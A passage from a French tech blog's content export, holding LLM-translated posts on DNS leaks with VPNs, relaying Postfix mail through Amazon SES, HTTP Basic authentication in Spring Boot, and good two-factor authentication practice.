en sachant quels noms de domaine vous avez essayé de résoudre Si vous utilisez un fournisseur VPN réputé et sa configuration par défaut incluant ses serveurs DNS sans faire de configuration réseau spécifique, vous êtes probablement en sécurité Vous pouvez (et devriez régulièrement) vérifier facilement si votre configuration présente des fuites DNS Sources et crédits # Photo de couverture par Daan Mooij sur Unsplash ","date":"2022-10-29","externalUrl":null,"permalink":"/fr/posts/2022/vpn-and-dns-leak-consequences-how-to-detect/","section":"Articles","summary":"Même si vous utilisez un VPN, votre FAI pourrait encore voir ce que vous faites. Comment ? À cause des fuites DNS. Apprenons-en davantage à leur sujet.","title":"VPN et fuites DNS - Quelles sont leurs conséquences et comment les détecter","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nSi vous avez déjà géré votre propre serveur de messagerie, vous savez à quel point il peut être pénible de bien configurer le SMTP. Outre la configuration impliquée, beaucoup de choses peuvent mal tourner, comme le fait que votre adresse IP soit mise sur liste noire, que les principaux fournisseurs de messagerie refusent vos e-mails, etc.\nUn moyen simple de s\u0026rsquo;assurer que votre serveur peut envoyer des e-mails sans trop de difficultés ni de maintenance est de configurer Postfix pour router les e-mails via Amazon SES (Simple Email Service). Dans cet article, nous verrons comment configurer ces deux systèmes.\nConfiguration de SES # La première étape est de configurer Amazon SES car nous avons besoin de l\u0026rsquo;adresse du serveur SMTP et des identifiants. Nous configurerons également les permissions appropriées pour nous assurer que notre utilisateur SMTP n\u0026rsquo;a pas plus de permissions que nécessaire.\nCréer des identités # La première étape est d\u0026rsquo;ajouter le domaine que nous utiliserons pour envoyer des e-mails en tant que nouvelle identité SES. Notez qu\u0026rsquo;il est aussi possible de simplement ajouter une identité d\u0026rsquo;adresse e-mail, mais dans ce cas, Amazon ne fournit pas de configuration DKIM, ce qui n\u0026rsquo;est pas bon pour l\u0026rsquo;acceptation des e-mails.\nAllez dans le tableau de bord SES et cliquez sur Verified Identities puis sur Create Identity (assurez-vous de vérifier la région en haut à droite de l\u0026rsquo;écran si c\u0026rsquo;est important pour vous) Sélectionnez Domain comme Identity Type et entrez le domaine depuis lequel vous voulez envoyer des e-mails Dans Advanced DKIM Settings, sélectionnez Easy DKIM, RSA_2048_BIT et désactivez Publish DNS records to Route53 si votre domaine n\u0026rsquo;est pas enregistré avec Route53 Vous devriez alors voir le même écran que la capture d\u0026rsquo;écran suivante. Modifiez vos enregistrements DNS avec les CNAME fournis. N\u0026rsquo;oubliez pas non plus d\u0026rsquo;ajouter include:amazonses.com dans votre configuration SPF pour permettre une meilleure livraison (voir mon article précédent sur SPF et DKIM) Amazon SES -\u0026gt; Configuration: Verified Identities -\u0026gt; test.ixonae.com Une fois toutes les étapes complétées, nous devrions pouvoir envoyer des e-mails en utilisant le domaine.\nIdentifiants SMTP, utilisateur IAM et permissions # Maintenant, créons les identifiants SMTP. Allez dans Amazon SES -\u0026gt; SMTP Settings et notez le SMTP endpoint qui est fourni. Ensuite, cliquez sur Create SMTP Credentials. On vous demandera de choisir un nom pour l\u0026rsquo;utilisateur IAM qui sera créé. Choisissez quelque chose qui vous aidera à comprendre ce qu\u0026rsquo;est l\u0026rsquo;utilisateur, comme ses-noreply-test-domain. Puis, sauvegardez les identifiants SMTP.\nEnsuite, nous nous assurerons que notre nouvel utilisateur IAM ne peut envoyer des e-mails que depuis notre domaine (par défaut, l\u0026rsquo;utilisateur IAM a le droit d\u0026rsquo;envoyer des e-mails en utilisant n\u0026rsquo;importe quelle identité de votre compte). Dans les paramètres de l\u0026rsquo;utilisateur IAM, vous devriez voir une politique inline comme suit :\n{ \u0026#34;Version\u0026#34;: \u0026#34;2012-10-17\u0026#34;, \u0026#34;Statement\u0026#34;: [ { \u0026#34;Effect\u0026#34;: \u0026#34;Allow\u0026#34;, \u0026#34;Action\u0026#34;: \u0026#34;ses:SendRawEmail\u0026#34;, \u0026#34;Resource\u0026#34;: \u0026#34;*\u0026#34; } ] } Nous remplacerons le * par le Amazon Resource Name (ARN) que vous pouvez trouver dans les détails de votre domaine dans Amazon SES/Verified identities. Il devrait ressembler à ceci arn:aws:ses:us-east-1:123455:identity/test.domain.com.\nMaintenant, notre utilisateur IAM n\u0026rsquo;a la permission d\u0026rsquo;envoyer des e-mails que pour notre domaine nouvellement ajouté. Nous pouvons aller plus loin et ne lui permettre d\u0026rsquo;envoyer des e-mails qu\u0026rsquo;en utilisant une adresse spécifique. Dans le panneau Verified Identities de notre domaine (dans SES), allez dans l\u0026rsquo;onglet Authorization et utilisez le générateur de politique. À partir de là, nous pouvons par exemple dire que nous voulons refuser SendRawEmail pour l\u0026rsquo;ARN de notre utilisateur IAM si le ses:FromAddress est StringNotEquals à une adresse spécifique.\nNotez que plutôt que d\u0026rsquo;utiliser le générateur de politique dans l\u0026rsquo;identité du domaine, vous pourriez très bien simplement créer une identité e-mail et donner l\u0026rsquo;ARN de cette identité comme ressource autorisée dans la politique d\u0026rsquo;accès de votre utilisateur IAM.\nConfiguration de Postfix # Maintenant que tout est prêt côté AWS, nous pouvons nous connecter en SSH à notre serveur et faire la configuration nécessaire. Notez que ce qui suit fonctionne pour les systèmes de type Debian. Je suppose également que vous n\u0026rsquo;utilisez pas Postfix pour quoi que ce soit en ce moment. Si c\u0026rsquo;est le cas, les modifications suivantes pourraient (ou non) casser votre configuration.\nAprès nous être assurés que sendmail n\u0026rsquo;est pas installé sur notre système, installons tous les paquets nécessaires.\nsudo apt install postfix libsasl2-modules Ensuite, nous ajouterons la configuration nécessaire avec les commandes suivantes (en tant que root). Vous devrez remplacer email-smtp.us-east-1.amazonaws.com, SMTPUSERNAME et SMTPPASSWORD par les valeurs fournies par SES dans la partie précédente.\npostconf -e \u0026#34;relayhost = [email-smtp.us-east-1.amazonaws.com]:587\u0026#34; \\ \u0026#34;smtp_sasl_auth_enable = yes\u0026#34; \\ \u0026#34;smtp_sasl_security_options = noanonymous\u0026#34; \\ \u0026#34;smtp_sasl_password_maps = hash:/etc/postfix/sasl_passwd\u0026#34; \\ \u0026#34;smtp_use_tls = yes\u0026#34; \\ \u0026#34;smtp_tls_security_level = encrypt\u0026#34; \\ \u0026#34;smtp_tls_note_starttls_offer = yes\u0026#34; # Nous configurons les identifiants, compilons la base de données des identifiants, et donnons les bonnes permissions echo \u0026#34;[email-smtp.us-east-1.amazonaws.com]:587 SMTPUSERNAME:SMTPPASSWORD\u0026#34; \u0026gt; /etc/postfix/sasl_passwd postmap hash:/etc/postfix/sasl_passwd chown root: /etc/postfix/sasl_passwd /etc/postfix/sasl_passwd.db chmod 0600 /etc/postfix/sasl_passwd /etc/postfix/sasl_passwd.db # Pour que Postfix puisse valider le certificat du serveur Amazon SES postconf -e \u0026#39;smtp_tls_CAfile = /etc/ssl/certs/ca-certificates.crt\u0026#39; systemctl restart postfix Notez que vous pourriez rencontrer les problèmes suivants lors de cette configuration :\n/etc/postfix/main.cf n\u0026rsquo;existe pas -\u0026gt; cp /etc/postfix/main.cf.proto /etc/postfix/main.cf postmap: fatal: bad string length 0 \u0026lt; 1: setgid_group = -\u0026gt; commentez la ligne setgid_group dans /etc/postfix/main.cf Une fois tout cela fait, nous devrions pouvoir tester que les envois se font correctement :\necho \u0026#34;Test Message\u0026#34;| mail -s \u0026#34;Subject\u0026#34; -a \u0026#34;From:me@test.domain.tld\u0026#34; recipient@domain.tld Si le mail n\u0026rsquo;est pas livré, vous pouvez consulter /var/log/mail.log. Dans le cas où vous avez un problème avec un enregistrement AAAA non trouvé, vous pouvez ajouter inet_protocols = ipv4 au fichier de configuration main.cf.\nRelais multiples et problèmes potentiels de livraison de courrier local # La configuration suivante vous permet de router plusieurs domaines à travers différents relais.\nSi vous avez suivi les étapes précédentes, il est aussi possible que le système ne soit pas capable de livrer les e-mails locaux à votre système (par exemple à root@myhostname.localdomain lorsqu\u0026rsquo;un problème de cron survient). La configuration suivante permettra également de corriger cela.\nModifions légèrement notre configuration pour corriger cela. Dans le fichier de configuration main.cf, nous commenterons la ligne commençant par relayhost = et ajouterons les deux lignes suivantes :\nsender_dependent_relayhost_maps = hash:/etc/postfix/relayhost_map smtp_sender_dependent_authentication = yes Ensuite, nous éditerons relayhost_map et ajouterons les informations suivantes (que nous avons commentées dans main.cf). Cela permettra à Postfix de savoir quels domaines il doit router à travers les relais.\n@my-domain.tld [email-smtp.us-east-1.amazonaws.com]:587 # N\u0026#39;était pas dans le fichier précédent, mais nous pouvons faire cela @my-domain2.tld [email-smtp.us-east-1.amazonaws.com]:587 Nous exécutons ensuite les commandes suivantes pour mettre à jour la base de données, et le problème ne devrait plus se poser.\n# Nous mettons à jour la base de données avec la configuration précédente postmap hash:/etc/postfix/relayhost_map # Au cas où les logs se plaignent de l\u0026#39;absence de /etc/aliases.db newaliases # C\u0026#39;est terminé systemctl restart postfix Ressources # https://docs.aws.amazon.com/ses/latest/dg/postfix.html Crédits # Photo de couverture par Daria Nepriakhina sur Unsplash ","date":"2022-10-23","externalUrl":null,"permalink":"/fr/posts/2022/how-to-use-postfix-to-relay-send-emails-through-amazon-ses/","section":"Articles","summary":"Comment tirer parti de Postfix pour permettre facilement à un serveur d’envoyer des e-mails via Amazon SES, et éviter une configuration et une maintenance compliquées","title":"Comment utiliser Postfix pour envoyer des e-mails via Amazon SES","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nSpring est l\u0026rsquo;un des frameworks Java les plus (sinon le plus) utilisés. Il possède de nombreuses fonctionnalités et peut vous permettre de démarrer rapidement un projet, mais si vous construisez une API, la partie gestion de l\u0026rsquo;authentification est mal documentée. Dans cet article, nous verrons comment tirer parti de Spring Security (v5.7.3) pour sécuriser votre API Spring Boot et affiner les permissions avec des rôles. Dans ce qui suit, je supposerai que vous avez quelques connaissances de Spring et Hibernate.\nOptions d\u0026rsquo;authentification # Malheureusement, Spring Security ne fournit rien pour générer des Tokens et les utiliser comme mécanisme d\u0026rsquo;authentification (ou du moins ce n\u0026rsquo;est pas visible dans la documentation), nous utiliserons donc Basic Auth.\nAuparavant, l\u0026rsquo;authentification pouvait être gérée avec la classe WebSecurityConfigurerAdapter (presque tous les tutoriels sur Internet l\u0026rsquo;utilisent), mais elle a été dépréciée cette année, nous ne l\u0026rsquo;utiliserons donc pas.\nPassons au code # Par défaut, Spring Security fournit des classes d\u0026rsquo;utilisateurs et de rôles, mais elles semblent nécessiter l\u0026rsquo;application de certains patchs de base de données et ne sont pas flexibles. Au lieu de les utiliser, nous créerons nos propres classes et implémenterons les bonnes interfaces, afin que ce soit plus facile maintenant, et à l\u0026rsquo;avenir si nous voulons étendre les fonctionnalités de notre classe User. Notez que j\u0026rsquo;utiliserai Lombok et JPA dans le code suivant.\nUtilisateurs # Pour rendre notre classe User compatible avec Spring Security, nous devrons implémenter org.springframework.security.core.userdetails.UserDetails. Au minimum, vous aurez besoin d\u0026rsquo;attributs username et password, qui sont utilisés par le framework. Vous devrez également implémenter diverses méthodes telles que getAuthorities (nous y reviendrons plus en détail), isLocked, \u0026hellip; Ces méthodes seront utilisées par Spring Security pour accorder l\u0026rsquo;accès, donc faites attention à ce qu\u0026rsquo;elles renvoient.\n@Entity @Audited @NoArgsConstructor @Table(name = \u0026#34;users\u0026#34;) public class User implements UserDetails { @Id @GeneratedValue @Getter private Long id; @Getter @Setter private String email; @Getter @Setter @Column(unique = true) private String username; @Getter @Setter private String password; @Getter @Setter private boolean enabled; @Getter @Setter private boolean locked; @Getter @Setter @Column(name = \u0026#34;expiration_date\u0026#34;) private Date expirationDate; @Setter @Getter @ElementCollection(fetch = FetchType.EAGER) @CollectionTable(name = \u0026#34;user_roles\u0026#34;, joinColumns = @JoinColumn(name = \u0026#34;user_id\u0026#34;)) private Set\u0026lt;UserRole\u0026gt; roles = new HashSet\u0026lt;\u0026gt;(); @Override public Collection\u0026lt;? extends GrantedAuthority\u0026gt; getAuthorities() { return roles; } @Override public boolean isAccountNonExpired() { return expirationDate == null || expirationDate.after(new Date()); } @Override public boolean isAccountNonLocked() { return !isLocked(); } @Override public boolean isCredentialsNonExpired() { return true; } } Vous noterez l\u0026rsquo;annotation @Audited. Elle est fournie par org.hibernate:hibernate-envers. Ce qu\u0026rsquo;elle fait, c\u0026rsquo;est s\u0026rsquo;assurer de conserver les anciennes versions de l\u0026rsquo;objet à chaque fois qu\u0026rsquo;une modification est poussée vers la base de données, ce qui est pratique pour la gestion des utilisateurs.\nImplémentation des rôles # Maintenant que nous avons notre classe User de base, configurons les rôles. L\u0026rsquo;implémentation est assez triviale, car il suffit d\u0026rsquo;implémenter GrantedAuthority et de surcharger la méthode getAuthority.\nIci, j\u0026rsquo;ai défini deux rôles en utilisant un enum, mais rien ne vous empêche de faire les choses différemment et d\u0026rsquo;utiliser d\u0026rsquo;autres rôles. Assurez-vous simplement de les nommer ROLE_[...].\n@Embeddable public class UserRole implements GrantedAuthority { @Setter @Enumerated(EnumType.STRING) @Column(name = \u0026#34;role_name\u0026#34;) private RoleName roleName; @Override public String getAuthority() { return roleName.name(); } public enum RoleName { ROLE_ADMIN, ROLE_USER } } Accès à la base de données # L\u0026rsquo;étape suivante consiste à s\u0026rsquo;assurer que Spring Security peut récupérer les détails des utilisateurs depuis la base de données. Pour cela, nous devrons implémenter deux classes. Premièrement, un JpaRepository pour permettre l\u0026rsquo;interrogation de la base de données.\n@Configuration public interface UserRepository extends JpaRepository\u0026lt;User, Long\u0026gt; { User findUserByUsername(String username); } Puis, une classe implémentant UserDetailsService, qui est ce que Spring Security utilise pour trouver les utilisateurs.\n@Component public class SecurityUserDetailService implements UserDetailsService { private final UserRepository _userRepository; public SecurityUserDetailService(UserRepository userRepository) { this._userRepository = userRepository; } @Override public UserDetails loadUserByUsername(String username) throws UsernameNotFoundException { return _userRepository.findUserByUsername(username); } } Configuration de la sécurité # Enfin, nous devons créer une classe de configuration pour définir comment Spring Security se comportera. Notez que nous désactivons la protection CSRF et configurons la gestion de session comme stateless. C\u0026rsquo;est parce que nous écrivons ceci pour être utilisé avec une API REST. Si vous construisez une interface web, vous ne devriez pas faire cela.\nNotez également la méthode passwordEncoder qui est utilisée pour définir comment les mots de passe sont hachés. Ici, ils utilisent 10 tours de bcrypt.\n@Configuration @EnableMethodSecurity public class SecurityConfiguration { @Bean public SecurityFilterChain filterChain(HttpSecurity http) throws Exception { http.csrf().disable().sessionManagement().sessionCreationPolicy(SessionCreationPolicy.STATELESS).and().authorizeRequests() .anyRequest().authenticated() .and() .httpBasic(); return http.build(); } @Bean public BCryptPasswordEncoder passwordEncoder() { return new BCryptPasswordEncoder(10); } @Bean public AuthenticationManager authManager(HttpSecurity http, BCryptPasswordEncoder bCryptPasswordEncoder, SecurityUserDetailService securityUserDetailService) throws Exception { return http.getSharedObject(AuthenticationManagerBuilder.class) .userDetailsService(securityUserDetailService) .passwordEncoder(bCryptPasswordEncoder) .and() .build(); } } Autoriser l\u0026rsquo;appel de méthodes par des rôles spécifiques # Si vous avez appliqué la configuration jusqu\u0026rsquo;ici, votre application exige désormais que les utilisateurs soient authentifiés pour accéder à tous vos endpoints. Voyons maintenant comment affiner qui peut accéder à quoi.\nPremièrement, vous pouvez gérer les choses depuis la classe de configuration. Par exemple, vous pouvez modifier la méthode filterChain comme suit pour permettre à quiconque d\u0026rsquo;interroger /api/public sans être authentifié, et exiger le rôle ADMIN pour accéder à /api/admin\nhttp.csrf().disable() .sessionManagement().sessionCreationPolicy(SessionCreationPolicy.STATELESS) .and().authorizeRequests() .antMatchers(\u0026#34;/api/public\u0026#34;).permitAll() .antMatchers(\u0026#34;/api/admin\u0026#34;).hasRole(\u0026#34;ADMIN\u0026#34;) .anyRequest().authenticated().and().httpBasic(); Une autre option est d\u0026rsquo;annoter directement vos contrôleurs. Ici, nous exigeons que les utilisateurs aient le rôle ADMIN pour accéder à /api/admin\n@RestController @RequestMapping(\u0026#34;/api/admin\u0026#34;) @PreAuthorize(\u0026#34;hasRole(\u0026#39;ADMIN\u0026#39;)\u0026#34;) public class AdminController { ... Enfin, vous pouvez directement annoter les méthodes dans vos contrôleurs. Vous remarquerez que la méthode utilise @AuthenticationPrincipal. Cela permet d\u0026rsquo;obtenir l\u0026rsquo;utilisateur authentifié faisant la requête et est totalement optionnel.\n@GetMapping(\u0026#34;/user/{userId}\u0026#34;) @PreAuthorize(\u0026#34;hasRole(\u0026#39;ADMIN\u0026#39;)\u0026#34;) ResponseEntity\u0026lt;?\u0026gt; getUser(@AuthenticationPrincipal User user, @PathVariable Long userId) { ... Derniers mots # Dans cet article, nous avons appris comment implémenter des mécanismes d\u0026rsquo;authentification de base pour fournir l\u0026rsquo;authentification et l\u0026rsquo;autorisation grâce à Spring-Security lors de l\u0026rsquo;écriture d\u0026rsquo;une API REST avec Spring Boot. Cela devrait suffire pour démarrer, mais notez que les fonctionnalités de Spring Security ne se limitent pas à ce qui est listé dans cet article. Par exemple, vous pouvez autoriser plusieurs groupes, utiliser d\u0026rsquo;autres annotations telles que @PostAuthorize, \u0026hellip;\nSources et crédits # Sources # Spring Security documentation Spring Security Authentication Spring Security Architecture Crédits # Photo de couverture par Clément Hélardot sur Unsplash ","date":"2022-08-22","externalUrl":null,"permalink":"/fr/posts/2022/setup-http-basic-authentication-with-java-spring-boot-rest-api/","section":"Articles","summary":"Spring Boot est la bibliothèque Java la plus populaire pour écrire des API REST, mais la documentation est insuffisante. Voyons comment implémenter l’authentification HTTP Basic.","title":"Configurer l'authentification HTTP Basic avec votre API Spring Boot","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nDans son rapport de transparence de 2021, Twitter a déclaré que seulement 2,3 % de tous les comptes actifs utilisaient l\u0026rsquo;authentification à deux facteurs entre juillet et décembre 2020, et bien que certaines entreprises comme Google (selon qui, 100 % des attaques automatisées par bots et 66 % des attaques ciblées peuvent être bloquées grâce à la 2FA) poussent les utilisateurs à l\u0026rsquo;adopter (en les inscrivant par défaut), elle n\u0026rsquo;est pas encore largement adoptée par les utilisateurs. Selon Persona, 38 % des grandes entreprises n\u0026rsquo;utilisent pas la 2FA.\nPourquoi en est-il ainsi ? Peut-être parce que beaucoup de gens sont encore confus quant aux avantages que l\u0026rsquo;on peut tirer de la 2FA, et comment l\u0026rsquo;utiliser correctement (par exemple, je connais quelques personnes qui utilisaient Google Authenticator sur leur téléphone sans aucune sauvegarde jusqu\u0026rsquo;à récemment), ou peut-être qu\u0026rsquo;ils ne savent tout simplement pas ce que c\u0026rsquo;est.\nDans cet article, je souhaite discuter des avantages de la 2FA, de ses pièges, et présenter différentes stratégies qui peuvent être utilisées pour tirer le meilleur parti de l\u0026rsquo;authentification multifacteur.\nQu\u0026rsquo;est-ce que l\u0026rsquo;authentification multifacteur ? # Le National Institute of Standards and Technology (NIST) définit l\u0026rsquo;authentification multifacteur comme suit :\nUn système d\u0026rsquo;authentification qui nécessite plus d\u0026rsquo;un facteur d\u0026rsquo;authentification distinct pour une authentification réussie.\nLes facteurs d\u0026rsquo;authentification # Il existe trois principaux types de facteurs d\u0026rsquo;authentification. Si vous possédez des comptes en ligne ou un smartphone, il y a de fortes chances que vous les utilisiez déjà tous. Comme vous l\u0026rsquo;avez probablement deviné, l\u0026rsquo;authentification à deux facteurs (2FA) signifie que vous utilisez deux facteurs différents de cette liste.\nQuelque chose que vous connaissez # C\u0026rsquo;est de loin le plus courant. En gros, cela inclut tout ce que vous avez mémorisé. Par exemple, un mot de passe ou un code PIN.\nQuelque chose que vous possédez # Quelque chose que vous possédez fait référence à un objet physique en votre possession. Il peut s\u0026rsquo;agir d\u0026rsquo;un jeton de sécurité physique, d\u0026rsquo;un téléphone (utilisant un authentificateur avec HOTP ou TOTP ou des notifications push), d\u0026rsquo;une clé de sécurité, ou d\u0026rsquo;une carte à puce.\nExemple de jeton de sécurité (Source : Wikipedia) Les codes d\u0026rsquo;authentification par SMS entrent également dans cette catégorie, mais ils sont généralement la forme d\u0026rsquo;authentification la moins recommandée en raison des risques d\u0026rsquo;interception et des attaques par échange de carte SIM. Si vous devez utiliser l\u0026rsquo;authentification multifacteur par SMS avec un compte, assurez-vous toujours (si possible) que les SMS ne peuvent pas être utilisés pour réinitialiser votre mot de passe, ou envisagez d\u0026rsquo;utiliser un numéro de téléphone que personne ne connaît.\nQuelque chose que vous êtes # Ce facteur est utilisé pour vous authentifier à l\u0026rsquo;aide d\u0026rsquo;une caractéristique physique de votre corps. Par exemple vos empreintes digitales, votre iris, votre voix, \u0026hellip;\nAvantages de l\u0026rsquo;authentification multifacteur # En résumé, l\u0026rsquo;avantage de l\u0026rsquo;authentification multifacteur est de rendre vos comptes en ligne plus sécurisés en garantissant que même si un acteur malveillant parvient à compromettre votre mot de passe, il ne pourra toujours pas se connecter à votre compte.\nPour plus de contexte :\nSelon Microsoft, 99,9 % des attaques sur les comptes peuvent être stoppées avec l\u0026rsquo;authentification multifacteur Même les mots de passe forts ne peuvent pas vous protéger contre toutes les attaques (Blog Microsoft) 100 % des bots automatisés, 99 % des attaques de phishing de masse et 66 % des attaques ciblées peuvent être stoppés par la 2FA (Google) Plus de 24 milliards de noms d\u0026rsquo;utilisateurs et mots de passe de comptes ont été exposés par des acteurs de la cybermenace à ce jour (Digital Shadows) Pourquoi vous n\u0026rsquo;utilisez probablement pas (correctement) la 2FA ? # Si vous utilisez la 2FA, il est statistiquement plus probable que ce soit par livraison de SMS (ce qui n\u0026rsquo;est pas recommandé), par notifications push, ou par TOTP.\nEn termes simples, le TOTP est l\u0026rsquo;algorithme utilisé lorsqu\u0026rsquo;un site web vous dit d\u0026rsquo;installer Google Authenticator et de scanner un QR code. Le serveur génère une clé secrète qui sera utilisée par votre application d\u0026rsquo;authentification pour générer un mot de passe à usage unique (généralement composé de 6 chiffres) qui changera en fonction du temps (généralement toutes les 30 secondes). Lorsque vous essayez de vous connecter avec le mot de passe à usage unique, le serveur calculera également le mot de passe à usage unique (en utilisant la clé secrète) et vérifiera qu\u0026rsquo;il correspond à ce que vous fournissez.\nSi vous suivez les meilleures pratiques de sécurité, vous avez probablement un gestionnaire de mots de passe pour stocker vos mots de passe (et si ce n\u0026rsquo;est pas le cas, vous devriez). Vous synchronisez aussi probablement votre gestionnaire de mots de passe avec votre téléphone et utilisez une application 2FA (comme Google Authenticator) sur le même téléphone (ou la fonctionnalité de gestion des mots de passe à usage unique de votre gestionnaire de mots de passe). Cela signifie que vous n\u0026rsquo;avez en réalité qu\u0026rsquo;un seul facteur d\u0026rsquo;authentification.\nEst-ce grave ? # Alors, vous n\u0026rsquo;utilisez pas vraiment la 2FA. Est-ce grave ? Eh bien, ce n\u0026rsquo;est pas nécessairement si grave\u0026hellip; Même si vous ne bénéficiez pas de tous les avantages d\u0026rsquo;une utilisation correcte de l\u0026rsquo;authentification multifacteur, vous êtes toujours protégé contre la compromission de vos comptes si un acteur malveillant parvient à obtenir votre mot de passe par des moyens tels que :\nVous vous connectez à votre compte depuis un appareil tiers compromis Vous êtes tombé dans le piège d\u0026rsquo;une attaque de phishing Vous vous connectez à votre compte en utilisant un protocole réseau faible sur un réseau non sécurisé Un autre site web où vous utilisez le même mot de passe est compromis, et l\u0026rsquo;acteur malveillant essaie votre identifiant et mot de passe ailleurs (bien que cela ne devrait pas arriver car vous suivez les bonnes pratiques de sécurité et utilisez un mot de passe différent pour chaque site) Cependant, si pour une raison quelconque votre appareil ou votre logiciel de gestion de mots de passe est compromis, il sera possible pour un acteur malveillant d\u0026rsquo;accéder à tous vos comptes.\nComment améliorer les choses # Je dirais que - tant que vous êtes conscient des risques que cela implique - vous n\u0026rsquo;avez pas nécessairement besoin d\u0026rsquo;améliorer les choses, du moins pas pour tous vos comptes. Laissez-moi développer avant de me huer.\nVous avez probablement beaucoup de comptes. Certains sont importants, et en perdre le contrôle vous causerait de grands dommages (par exemple votre compte e-mail, le registrar où vous avez vos noms de domaine, \u0026hellip;) Certains ne sont pas si importants. Bien sûr, perdre votre compte Netflix serait légèrement ennuyeux, mais il ne stocke pas d\u0026rsquo;informations sensibles, et quelqu\u0026rsquo;un qui y accède ne peut pas vous causer de dommages (comme transférer votre argent).\nGérer correctement l\u0026rsquo;authentification multifacteur sera probablement plus contraignant, donc pour les comptes moins importants, cela peut être un bon compromis de perdre un peu de sécurité pour gagner beaucoup de commodité. Passons en revue les différentes choses que vous pouvez mettre en place.\nUn mot sur les sauvegardes # Tout d\u0026rsquo;abord, parlons de quelque chose d\u0026rsquo;important mais souvent négligé : les sauvegardes. Vous devez être conscient que, quelle que soit votre méthode de gestion de la 2FA, si vous perdez l\u0026rsquo;accès à ce que vous utilisez pour la 2FA, il sera extrêmement pénible de reprendre le contrôle de vos comptes.\nMême si vous utilisez des services en ligne pour stocker vos mots de passe et vos codes 2FA, il y a un piège. Disons que vous utilisez Authy pour gérer vos codes TOTP. Authy vous permet de chiffrer votre sauvegarde avec un mot de passe. Vous utilisez cette option et stockez le mot de passe dans votre gestionnaire de mots de passe. Pour une raison quelconque, vous perdez le contrôle des appareils où vous êtes connecté à Authy et à votre gestionnaire de mots de passe. Cela signifie que vous ne pourrez pas accéder à Authy car vous ne connaissez pas le mot de passe de sauvegarde, et vous ne pourrez pas accéder à vos mots de passe car vous ne pouvez pas fournir le code 2FA à votre gestionnaire de mots de passe.\nQuoi qu\u0026rsquo;il en soit, je discuterai de quelques options que vous pouvez utiliser pour les sauvegardes, mais assurez-vous d\u0026rsquo;en avoir toujours qui sont :\nNon protégées par un mot de passe enregistré uniquement dans votre gestionnaire de mots de passe Dans des emplacements géographiques différents Utilisables : vous voulez tester vos sauvegardes régulièrement. Rien n\u0026rsquo;est pire que de devoir utiliser des sauvegardes et de découvrir qu\u0026rsquo;on ne peut pas les utiliser à cause d\u0026rsquo;une erreur de format ou autre La 2FA la plus sécurisée (correcte) # Cette option est la plus sécurisée. On fait tout dans les règles de l\u0026rsquo;art, et on s\u0026rsquo;assure que nos mots de passe et codes TOTP/de récupération ne sont pas stockés au même endroit. L\u0026rsquo;option que je recommanderais pour cela est d\u0026rsquo;utiliser des clés de sécurité comme les Yubikeys. Il y a deux façons d\u0026rsquo;utiliser ces clés :\nFIDO U2F : en gros, il suffit de toucher la clé pour confirmer que vous voulez vous connecter à un service. C\u0026rsquo;est pratique et sécurisé, mais cela pourrait ne pas être supporté par votre smartphone, et beaucoup de services ne le supportent pas non plus Enregistrer vos codes TOTP dans la Yubikey et utiliser l\u0026rsquo;application d\u0026rsquo;authentification. De cette façon, vous pouvez générer des mots de passe à usage unique depuis n\u0026rsquo;importe quel appareil, et la clé secrète ne quitte jamais la Yubikey, mais il y a une limite au nombre d\u0026rsquo;éléments que vous pouvez stocker En plus de ces contraintes, vous devez vous assurer d\u0026rsquo;avoir des sauvegardes en cas de perte de votre clé. La méthode que je recommande pour les gérer est d\u0026rsquo;avoir au moins une clé de sauvegarde et un bloc-notes avec les codes de récupération stockés dans un endroit sécurisé. Un petit mot sur les codes de récupération : ce sont essentiellement des mots de passe à usage unique pré-générés par le service au cas où vous perdriez l\u0026rsquo;appareil que vous utilisez pour stocker vos codes TOTP. Vous n\u0026rsquo;en avez pas nécessairement besoin si vous avez une sauvegarde de la clé secrète TOTP.\nCette méthode vous assure une haute sécurité, mais elle a un coût : la commodité. Prendre soin de toujours avoir la sauvegarde synchronisée est chronophage. C\u0026rsquo;est pourquoi je recommande d\u0026rsquo;utiliser cette méthode avec les comptes très importants : comme ils doivent être aussi sécurisés que possible, et parce qu\u0026rsquo;ils ne changeront probablement pas beaucoup, il y a peu de maintenance à faire côté sauvegarde.\nAutres formes de 2FA # Si vous ne voulez pas vous embêter à créer manuellement une sauvegarde pour chaque service que vous utilisez, vous pouvez toujours ne pas synchroniser votre gestionnaire de mots de passe avec votre smartphone, et utiliser votre smartphone pour stocker vos codes 2FA à l\u0026rsquo;aide de logiciels comme Authy (pas idéal pour votre vie privée) ou un gestionnaire de mots de passe comme Bitwarden (mais en n\u0026rsquo;y stockant que les codes 2FA).\nNotez que quel que soit le logiciel que vous utilisez pour stocker et synchroniser vos codes 2FA, vous devez toujours avoir des sauvegardes vous permettant de récupérer l\u0026rsquo;accès à celui-ci (et à toutes ses données).\nPas vraiment de la 2FA, mais\u0026hellip; # Si les options précédentes ne sont pas réalisables pour vous (bien que vous devriez vraiment au moins protéger vos comptes les plus importants avec une clé de sécurité), utiliser des codes TOTP d\u0026rsquo;une manière qui n\u0026rsquo;est pas une 2FA correcte est quand même mieux que de ne pas les utiliser. Dans ce cas, il y a encore quelques choses que vous pouvez faire pour améliorer un peu votre sécurité :\nenvisagez d\u0026rsquo;utiliser un logiciel de gestion de mots de passe différent pour stocker vos codes TOTP et vos mots de passe. De cette façon, si votre gestionnaire de mots de passe principal est compromis, vos comptes sont toujours en sécurité envisagez de n\u0026rsquo;utiliser le logiciel où vous stockez vos codes TOTP que sur un seul appareil, comme votre smartphone. De cette façon, vous pouvez réduire la surface d\u0026rsquo;attaque (même si votre ordinateur est compromis, vos codes 2FA sont en sécurité) Encore une fois, même utiliser votre gestionnaire de mots de passe pour stocker à la fois vos mots de passe et obtenir vos codes 2FA est toujours mieux que de ne rien faire, et vous offrira un bon niveau de sécurité supplémentaire sans vous coûter aucun inconvénient.\nSources et lectures complémentaires # Questions…and buzz surrounding draft NIST Special Publication 800-63-3 (NIST) New research: How effective is basic account hygiene at preventing hijacking (Google Security Blog) Two-factor authentication statistics (Persona) Your Pa$$word doesn\u0026rsquo;t matter (Microsoft) Account Takeover in 2022 (Digital 